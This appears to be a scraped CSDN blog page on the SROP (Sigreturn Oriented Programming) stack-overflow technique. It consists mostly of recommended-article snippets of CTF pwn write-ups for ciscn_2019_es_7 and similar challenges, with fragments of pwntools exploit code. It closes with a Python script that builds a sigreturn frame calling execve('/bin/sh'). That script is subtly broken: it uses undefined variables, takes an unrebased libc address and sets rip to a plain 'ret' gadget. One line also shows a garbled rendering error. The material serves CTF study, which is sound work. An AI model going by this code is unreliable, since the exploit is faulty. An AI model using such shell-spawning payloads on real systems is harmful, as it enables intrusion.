栈溢出之SROP

最新推荐文章于 2025-03-27 13:54:06 发布
原创 最新推荐文章于 2025-03-27 13:54:06 发布 · 236 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 471
[BUUCTF]ciscn_2019_es_7
[BUUCTF]PWN——ciscn_2019_es_7[详解]
mcmuyanga的博客
01-12 2008
ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想到了SROP,之前遇到过一次,关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop
2301_79326813的博客
01-30 641
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
buuctf ciscn_2019_es_7
qq_42728977的博客
04-13 911
srop 之前听说过,但是没做过,今天算是见识了。 整体思路就是 就是在内核返回到用户时,会把原来的context(保存在栈里)给复原,栈里
ciscn_2019_es_7
m0_73756460的博客
02-27 279
buu刷题ciscn_2019_es_7【wp】
精选资源
栈溢出基础知识、栈溢出保护机制、栈溢出利用方法.docx
01-10
栈溢出是计算机安全领域中的一个重要概念,主要发生在程序运行过程中,由于栈空间分配不当,导致数据超出预定的栈帧范围,从而影响到其他栈帧中的数据,甚至可能破坏程序执行流程,造成安全风险。本篇文章将深入探讨...
linux 栈溢出
sky123博客
02-01 4448
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 720
(仅作为本人的学习笔记和心得 如有错误请多指教)
内存使用深度剖析:栈溢出检测3大手段+动态分配效率提升80%的优化策略
常见的内存问题包括**栈溢出、堆内存泄漏、野指针和重复释放**等,这些问题在高并发或长期运行的服务中尤为突出。 以C/C++为例,手动内存管理极易引入缺陷。例如,以下代码存在典型的栈溢出风险: ```c void ...
SROP 学习笔记
Assassin
05-14 1135
文章目录一、基本介绍二、signal 机制三、攻击原理四、SROP chain的构造五、关于利用六、例题讲解 本文只是学习的记录文章,主要是以CTF wiki为主,然后加上例题讲解。 一、基本介绍 SROP(Sigreturn Oriented Programming) 于 2014 年被 Vrije Universiteit Amsterdam 的 Erik Bosman 提出,其相关研究Framing Signals — A Return to Portable Shellcode发表在安全顶级会议
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
buuctf ciscn_2019_es_7的wp
wuyvle的博客
03-15 1635
打开一看,我觉得是srop,具体知识不先介绍了 这是一个最简单的攻击。在这个攻击中,有4个前提条件: 第一,攻击者可以通过stack overflow等漏洞控制栈上的内容; 第二,需要知道栈的地址(比如需要知道自己构造的字符串/bin/sh的地址); 第三,需要知道syscall指令在内存中的地址; 第四,需要知道sigreturn系统调用的内存地址。 我们先要泄露buf在栈上的地址,我们能在sys_read上写0x20个,而wirte可以打印0x30的, 可以泄露 from pwn import * .
BUUCTF ciscn_2019_es_7
最新发布
2401_85052854的博客
03-27 925
里面有这些东西,这个mov rax 15,对于我们构造srop非常重要,因为我们构造srop需要伪造sigreturn调用,而15就是sigreturn的系统调用号,对于系统调用什么函数,取决于rax里面的值,所以这里帮我们把rax设置成15了,所以记录一下这里的地址。srop就是溢出到返回地址,需要先调用sigretrun,在放入我们构造的sigframe,这里需要用bytes(sigframe),不能用str(sigframe),sigframe.rax直接=59也可以。
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 585
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
SROP三连击(ciscn_2019_es_7、rootersctf_2019_srop、360chunqiu2017_smallest)
huzai9527的博客
03-25 535
SROP】ciscn_2019_es_7 1. ida 分析 vuln有两个函数,read、write;read函数存在栈溢出,write能够泄露栈上的地址 存在sigreturn的调用 2. 思路 首先泄露栈上的返回地址,然后通过gdb调试,输入的参数与返回地址的偏移 有了参数地址,站地址-偏移,就可以输入/bin/sh且得到它的地址 有了/bin/sh、栈地址、sigreturn、syscall就可以使用SROP 3. exp from pwn import * #p = proces
【BUUCTF】ciscn_2019_es_2
m0_51251108的博客
12-28 364
【BUUCTF】ciscn_2019_es_2 看下程序 有两处read可以溢出,但只能溢出刚好盖到ebp和ret 由于memset只清了0x20,所以可以泄露出ebp 有system函数,但参数不对 思路:运用栈迁移,迁移到我们写入的前面的部分,写rop链,就可以开shell了 由于需要跳转到我们写入的前面的部分需要知道它的地址,地址=ebp地址-偏移。 用gdb-peda调试,断点设在vul函数,一步步跟进,可以输入aaaa 然后searchmem aaaa stack 来查看栈状态 (这图可能
ciscn_2019_sw_7
seaaseesa的博客
05-01 606
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
BUUCTF【hitcontraining_magicheap】
weixin_51055545的博客
02-13 1813
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
SROP ctfshow
01-16
### SROP 技术详解 SROP (Sigreturn Oriented Programming) 是一种高级攻击技术,主要针对启用了 NX(No-eXecute)保护的系统。这种技术利用了类 Unix 系统中的 Signal 机制来绕过某些安全防护措施[^2]。 #### 工作原理 当一个信号被捕获并处理完毕后,`sigreturn` 系统调用会被用来恢复之前被中断的状态。如果能够控制 `sigreturn` 的参数,则可以精心构造寄存器状态以及堆栈指针的位置,从而执行任意代码或操作。具体来说,在触发特定条件下的异常时,可以通过伪造的上下文让 CPU 执行预期之外的操作序列。 对于 CTF 比赛而言,通常会遇到只有部分功能可用的情况,比如题目中提到的存在栈溢出漏洞但缺少标准库函数入口地址的情形下,就可以考虑使用 SROP 来构建 payload 实现远程命令执行或其他目的[^3]。 #### 构造 Payload 为了成功实施基于 SROP 的攻击,需要满足以下几个要素: - **找到合适的 gadget**: 需要在二进制文件内部寻找可用于设置寄存器值的小片段指令集合。 - **确定 sigreturn syscall number**: 对于 x86_64 架构,默认情况下其编号为 0xf 或者说 15 十进制数。 - **准备有效的 frame 数据结构**: 这里涉及到如何填充各个字段使得最终能跳转到想要的目标位置。 下面给出一段 Python 脚本作为例子展示怎样通过 pwntools 库创建这样的载荷: ```python from pwn import * # 假设已知的信息如下 binary = ELF('./target_binary') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') rop = ROP(binary) # 设置目标架构和环境变量 context.arch = 'amd64' context.os = 'linux' # 创建 Sigreturn Frame frame = SigreturnFrame() frame.rax = constants.SYS_execve # execve system call number on amd64 is 0x3b frame.rdi = next(libc.search(b'/bin/sh')) # argv[0], path to shell binary frame.rsi = 0 # argv, NULL pointer frame.rdx = 0 # envp, also a NULL pointer frame.rip = rop.find_gadget(['ret'])[0] payload = b'A' * offset_to_return_address + pack(rop_chain.address) + bytes(frame) ``` 这段脚本展示了如何利用 pwntools 中提供的 API 来简化复杂过程,并且自动计算所需的各种偏移量等信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叶叶扁舟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值